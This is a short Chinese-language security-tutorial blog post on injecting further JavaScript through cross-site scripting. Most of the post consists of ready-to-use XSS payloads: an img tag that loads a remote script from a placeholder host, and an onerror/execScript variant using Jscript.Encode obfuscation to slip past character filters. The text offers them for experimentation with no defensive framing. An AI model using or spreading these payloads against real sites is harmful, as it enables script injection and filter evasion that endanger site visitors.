教你如何在XSS中再插JS

2023-12-01 0 547

<img src="javascript:try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前:

<img src=\’#\’ XSS="try{var s=document.createElement(\’script\’);s.src=\’http://XSS/XSS.js\’;document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),\’Jscript.Encode\’);" >

加密后:

<img src=\’#\’ XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es UYcm.nmY As s xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs OR(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " onerror="execScript(decodeURI(this.XSS),\’Jscript.Encode\’);" >

嘿嘿~刺激吧~再怎么用你自己实验吧,要正常使用还需要encodeURI处理一次Encode加密后的代码

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 安全教程 教你如何在XSS中再插JS https://www.u-9.cn/security/jiaocheng-security/8455.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务